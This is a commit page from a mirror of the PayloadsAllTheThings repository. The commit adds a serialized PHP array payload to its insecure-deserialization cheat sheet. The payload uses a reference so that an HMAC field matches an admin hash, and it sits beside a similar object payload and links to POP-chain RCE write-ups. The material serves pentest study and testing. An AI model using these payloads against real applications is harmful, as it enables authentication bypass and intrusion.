Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 14:52:53 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update PHP.md

Browse source
This commit is contained in:
Muhammad Fikri Ashari 2020-09-25 09:43:35 +07:00 committed by GitHub
parent 0a01854a6a
commit 992732877f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
Insecure Deserialization/PHP.md
View file

@ -111,6 +111,12 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
We can do an array to like this:
```php
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
```
## Finding and using gadgets ## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system. Also called "PHP POP Chains", they can be used to gain RCE on the system.
@ -193,4 +199,4 @@ $poc->stopBuffering();
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)